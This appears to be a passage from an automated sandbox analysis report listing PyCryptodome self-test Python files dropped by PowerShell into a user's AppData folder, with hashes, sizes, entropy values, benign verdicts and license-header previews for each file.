                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\IO\test_PKCS8.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):19565
                                                                                                                                                                                                  Entropy (8bit):5.2619407746416655
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:rrskrs9Vq8dd/zJDCLv9sbPkkebKQ1SWh8G+rRfan:rr6qgd/zJDov9srkmQ1Sdr1an
                                                                                                                                                                                                  MD5:475E96AA38DE346D19BD1C7BF9AC5DF7
                                                                                                                                                                                                  SHA1:45892248A0D20358EF2EAF1CC6F84582C119D2D5
                                                                                                                                                                                                  SHA-256:0F02942929784AB768BDAC13A9FF91BAF09E949FE9A4E94B72664F86A71E07EE
                                                                                                                                                                                                  SHA-512:23485DBBF0B3DACE97A810108D456A1062B9449EDED59BADD386A197758336AA75F3F4CE9C0BEA607663B88CBB7991455AC3B8CFE0A2025A3BF5DBCBE82234A7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/IO/test_PKCS8.py: Self-test for the PKCS8 module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Math\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2253
                                                                                                                                                                                                  Entropy (8bit):5.265534509270815
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RQWOqrYJALrYJHdG43tDs3EsIG13NcuIHMo0xlxqxUxaGtraZy:6DqrYJALrYJHdt3EHGuIsokTOEaGtrh
                                                                                                                                                                                                  MD5:193EF9AAB49C856D4333036CB09C927C
                                                                                                                                                                                                  SHA1:95D64BBE10A2A6631FF0EC434AD42C0F2554A2B6
                                                                                                                                                                                                  SHA-256:73D30940D7505A54B81211BB5BFB364CF389486220F3749A1B3783588AE316C9
                                                                                                                                                                                                  SHA-512:37583CB8A1AC70B2AC4453A7DBDFA384517F376515041F74E2DC3D926BE5AB499099C33414FFD09839A29FD814D372A71CA32CB73D67E79FB11BEFA1BB44DE33
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Math/__init__.py: Self-test for math module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO E

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Math\test_Numbers.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (340), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):32598
                                                                                                                                                                                                  Entropy (8bit):4.827746010636288
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:+r6qCaltwxENWAdqaRou/dzKkB3F3H2mnGH:+rpCwtwxENWAo2b0
                                                                                                                                                                                                  MD5:4F0AAC69E3310C34FF9D1CF39EEDF325
                                                                                                                                                                                                  SHA1:A8FB56868AD18382114D035319A69D80CB2A7641
                                                                                                                                                                                                  SHA-256:C99AB636077E7B46B07D83440E3843E907E8838E62DDB5F0E705B5D2A9984749
                                                                                                                                                                                                  SHA-512:3FC3D64D1245E9BC66A0158BFDD0D133F306D0DE6DE274B5719C7EF1958B1DCDF5D6D060E1FC856B25B94ECD63A810C96A7742B854E8594BCFB1B95AED2D7B01
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Math/test_Numbers.py: Self-test for Numbers module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED.

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Math\test_Primality.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (369), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4999
                                                                                                                                                                                                  Entropy (8bit):5.3379909826043574
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:+eDqrYJALrYJHdt3EHGuI7PH1opz94FksTjTOqOh98LfgeBrp:+sqrskrs9t3q/Ik9izT1OYIgrp
                                                                                                                                                                                                  MD5:24878E5A9765069E457777F362D58556
                                                                                                                                                                                                  SHA1:F6FE995D3D2477A853D94C8FF4BD28B240833FE8
                                                                                                                                                                                                  SHA-256:9E2BA49B922820DFA0AD60532E98747DBBD03796F3DF2B3701B0373D1A254F09
                                                                                                                                                                                                  SHA-512:97B227C53D4CEFB64F47BF67495D757B268CE2AC91C1ECA596CD6072BA5C700DE03AFA915ADE52BBA57D4A8CE3616F38D62B2AE1C29F5FD981FD93109DB4BE3A
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Math/test_Primality.py: Self-test for Primality module..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIM

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Math\test_modexp.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (526), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):8304
                                                                                                                                                                                                  Entropy (8bit):5.1628761666181795
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Tqrskrs9t3q/IsgOvG4xmV1vFEcOLpCp01p0opQPOp:Grskrs9VqvvG4SHOF2Qrz
                                                                                                                                                                                                  MD5:8493CFB3E2E9FCA2CCE57F7E5978CF01
                                                                                                                                                                                                  SHA1:EC340955DD4BB061DB5D2B181E258951DE94F7FB
                                                                                                                                                                                                  SHA-256:0FEA1E2F8E4285DEE62676C7E87D438EF421F948BDB8B412EC453A0D4DECA6D5
                                                                                                                                                                                                  SHA-512:C03FDC899951CBFE93264C618698B4C41D83B8508443E61FFB4AE8CB6B6EE57280192CB6BE7E91A293191727B4B5AB0A77AF0383972D524D13BBEA6BD68D3CCD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Math/test_modexp.py: Self-test for module exponentiation..#..# ===================================================================..#..# Copyright (c) 2017, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISC

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Math\test_modmult.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with very long lines (535), with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):4980
                                                                                                                                                                                                  Entropy (8bit):5.438563739839803
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:vDqrYJALrYJHdt3EHGuIDPAtrftMopqbacxCINrW6u5/qAC0qNaPOa:bqrskrs9t3q/IRopquOhWx5/qEXPOa
                                                                                                                                                                                                  MD5:6F726584647B71739BBE490252FF0475
                                                                                                                                                                                                  SHA1:B9EFBAFF2529BE4141186CDFF8DDF8F6E5507218
                                                                                                                                                                                                  SHA-256:8B83A8374C7929213AC42BC379DD2E3923B015203BFDAB61EFCC2AE7E8986C6D
                                                                                                                                                                                                  SHA-512:1CC1B2F722ACB1FBA3CC99A4C251223FAE5D766646F79ED30E87EDCD6102F323B302ACC3DD1D5C41CA65D0E6D7E12839C65580E4C931EF44F2A9D7CA829742F8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Math/test_modmult.py: Self-test for custom modular multiplication..#..# ===================================================================..#..# Copyright (c) 2023, Helder Eijs <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Protocol\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1880
                                                                                                                                                                                                  Entropy (8bit):5.2502959979894195
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NX1G2wEIB0jcQHMsvI/S3oCFx1p0uFJtityraZa:rTwfFQHvoSpTFJNrB
                                                                                                                                                                                                  MD5:9BAF5A68FE8F27D1DC5E3835B09AE251
                                                                                                                                                                                                  SHA1:7A4C6CB96061378BC70FB165D80464951AD14B5F
                                                                                                                                                                                                  SHA-256:8883ABB95F9BCC3D39B2A7707045D20EA66ACF1BB4DC7924C7676A44EDC066AF
                                                                                                                                                                                                  SHA-512:AD37A7836EA7A6DC0D97144E1A721E5C1618E6D4F91010D9D3F48B7B651037E0CF90982A6C15A1E702EC7E9F7B825E5ABD0FD3D5CF047ED840DD5709C84520A3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Protocol/__init__.py: Self-tests for Crypto.Protocol..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Protocol\test_KDF.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, Unicode text, UTF-8 text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):37587
                                                                                                                                                                                                  Entropy (8bit):5.3282002804951665
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:mc1DUj9pFEoJioLmZJo1ouofozoOuLuHxo+ofOM4LEKMv:mciSGiOm3qpmqYAxnXEKc
                                                                                                                                                                                                  MD5:ECE27576B17C7C6FF58D4DEA555F7D00
                                                                                                                                                                                                  SHA1:721307F971B9ADE39A4B972121E537A420F9086E
                                                                                                                                                                                                  SHA-256:22B5EBC0BFD82BA5D7D3294C0701794D875A69F40624CA7E2FB37A87970D1139
                                                                                                                                                                                                  SHA-512:206BF6F8A39BD3A06CFAE4D1DC7AFF6907D536FDD904661A3BC958CF6114F09A0D9C06C66A4FCC0F254B5A2494D831E4CE8E850FACE76D098A39885A390FDBC3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/Protocol/test_KDF.py: Self-test for key derivation functions..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE..#

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Protocol\test_SecretSharing.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9952
                                                                                                                                                                                                  Entropy (8bit):5.092380043305687
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:3qrskrs9t3q/IvRXxuQaCu31Vy5+/sC/GSShBsTbrS:arskrs9VqkxuQaxl/sCutIG
                                                                                                                                                                                                  MD5:E47ACE891AB98689B03CD52457E9D952
                                                                                                                                                                                                  SHA1:186FD91CCD5C3E2609FCA91E6F852D675760FA68
                                                                                                                                                                                                  SHA-256:01F48396E41FB1F1B0BEC975521517247AB2FC7E25FB108064BCD6288EDBCE66
                                                                                                                                                                                                  SHA-512:1765BD953CE9C8F14AF1D81053A57C07EA2A79BD9FAF012DB417158C115950B3DD135CA542A6826AAD2868C46E72F62839AF87649154CFCA7264B242D24FCD09
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# SelfTest/Protocol/test_secret_sharing.py: Self-test for secret sharing protocols..#..# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PUR

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Protocol\test_ecdh.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):10784
                                                                                                                                                                                                  Entropy (8bit):4.78981017921065
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:192:Cw7OCjqu+vTy1eT0s8IHfX88sOJzIn1xCiKVz8bBVjjnKOa:BWucy1YpfJUDCiK18bf2
                                                                                                                                                                                                  MD5:482A7F06CA1AC5495FA66573F87A325F
                                                                                                                                                                                                  SHA1:529DD31BFACC857B86262C417A7C958EA4A886D0
                                                                                                                                                                                                  SHA-256:6019F99443B9F1234CCE6E24E6E3DD99547D932AEB5251E7FB604ACCC48CBE1F
                                                                                                                                                                                                  SHA-512:A3B25168AB10C9A6B207BC32E9D6F36C3F783D32EBEDE156654F649298628942D3B89BC4D3E82A10654D75B8397642808192630382658303F6CE0473925CE3B1
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:import re..import unittest..from binascii import hexlify....from Crypto.Util.py3compat import bord....from Crypto.Hash import SHA256..from Crypto.PublicKey import ECC..from Crypto.SelfTest.st_common import list_test_cases..from Crypto.SelfTest.loader import load_test_vectors, load_test_vectors_wycheproof....from Crypto.Protocol.DH import key_agreement......class FIPS_ECDH_Tests_KAT(unittest.TestCase):.. pass......test_vectors_verify = load_test_vectors(("Protocol", ),.. "KAS_ECC_CDH_PrimitiveTest.txt",.. "ECC CDH Primitive (SP800-56A Section 5.7.1.2)",.. {.. 'qcavsx': lambda x: int(x, 16),.. 'qcavsy': lambda x: int(x, 16),.. 'diut': lambda x: int(x, 16),.. 'qiutx': lambda x: int(x, 16),..

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\Protocol\test_rfc1751.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2270
                                                                                                                                                                                                  Entropy (8bit):5.332184874162283
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:RDEWIB0jcQHMsvI/S3oCFlF+a+QoT1OiPoMEYaMiWvEaSA:NkFQHvoCF7HvIvKA
                                                                                                                                                                                                  MD5:CBD669C019031D8BD673CE75FFCABBC9
                                                                                                                                                                                                  SHA1:8AD94D21B3E7394A43DA56412ED3D7A985D2ABAD
                                                                                                                                                                                                  SHA-256:5BA5CF5C2665263DF853E60CE4A6ECFD8E74910C13FA92F7B32841501BF90C59
                                                                                                                                                                                                  SHA-512:9D870E5CD01B7E2C8767EB2DB965512D91FEE5A0E9A7B9100483E8E6D8B72C1D7A0DAA0FCD912126E6C7494D81426DC7E5885CC7F55CB28674A0652240C7B7DF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:#..# Test script for Crypto.Util.RFC1751...#..# Part of the Python Cryptography Toolkit..#..# Written by Andrew Kuchling and others..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTION WITH THE SOFTWARE OR THE U

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\__init__.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2171
                                                                                                                                                                                                  Entropy (8bit):5.107065900658561
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:NlewEIB0jcQHMsvI/S3oCFS+0mzvYMguTOaT:7ewfFQHvov23Oa
                                                                                                                                                                                                  MD5:16A772A3446659C213576E2764F399D7
                                                                                                                                                                                                  SHA1:88C5C7B483ADAF2E6B9633461BF341C2279A8B5E
                                                                                                                                                                                                  SHA-256:224DAB6C290328730A1E963220152817E26D968CDFFF2E85DCA8CA0D19FA8800
                                                                                                                                                                                                  SHA-512:5E60DB98AB80DC2AB63EB752368B2BF76CB3F0DD320E49E52AE145F27EC6B0FB688711B55013CE3519FAB6BCBEBE7CBF660A835F40AF7A71F30C737428850CA7
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/__init__.py: Self-test for public key crypto..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_DSA.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):9847
                                                                                                                                                                                                  Entropy (8bit):5.126770879872313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:96:GwfFQHvo+3HFMW5pWfvSMkaVExfZBABjBUBO4LVXvkhaVbICOHA+EtOlNb4ZqPbG:GwdQHvtxTWiMFVMjXvkhbElwTCxr2CrZ
                                                                                                                                                                                                  MD5:7F395A7282137DE7AD45DBBBC587CC59
                                                                                                                                                                                                  SHA1:B0356AEC021563188303A2A524B6B9C49B4EBC56
                                                                                                                                                                                                  SHA-256:60F3FAF47612A9DF1B4D89B06B38E1B6286D3CF2D77F4493FE7EBAF664A087B1
                                                                                                                                                                                                  SHA-512:70BB36338F544ED31F3737712E1674C21997817A7691707081BDC101360F20E65D2B8923E7EE1F0299B5F2053815F201EF110CB69A10DA9243E040206C237A0E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Preview:# -*- coding: utf-8 -*-..#..# SelfTest/PublicKey/test_DSA.py: Self-test for the DSA primitive..#..# Written in 2008 by Dwayne C. Litzenberger <dlitz@dlitz.net>..#..# ===================================================================..# The contents of this file are dedicated to the public domain. To..# the extent that dedication to the public domain is not available,..# everyone is granted a worldwide, perpetual, royalty-free,..# non-exclusive license to exercise all rights associated with the..# contents of this file for any purpose whatsoever...# No rights are reserved...#..# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,..# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF..# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND..# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS..# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN..# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN..# CONNECTI

                                                                                                                                                                                                  C:\Users\user\AppData\Local\ChromeApplication\Lib\site-packages\Crypto\SelfTest\PublicKey\test_ECC_25519.py

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):14014
                                                                                                                                                                                                  Entropy (8bit):5.321898620860337
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Frskrs9Vq84ktZf7Tslvli+h2ZerUbZttyZMkdZeU0ZpX/ZgeUmZj9aZqELZpZ4V:Fr6q84g53slvli+h20rUbvtyykd0U0HV
                                                                                                                                                                                                  MD5:1D22C9180740F1EA72DF084954EB283D
                                                                                                                                                                                                  SHA1:B3B723EEC6826054E35187067EB99EA290DAA364
                                                                                                                                                                                                  SHA-256:1F840B622E7315C5C5A923D8454A5B9C66322CEB9D33B812CEC8A6D8761F4A2B
                                                                                                                                                                                                  SHA-512:A518551D6C8D48364F218255FCFF288F2E87D923939A7C1C1465620FB381C1275FE29F1C2453B20E37B3668D8C48E75BF2FA96A21BFE1725258FA80466FA76F6
                                                                                                                                                                                                  Malicious:false
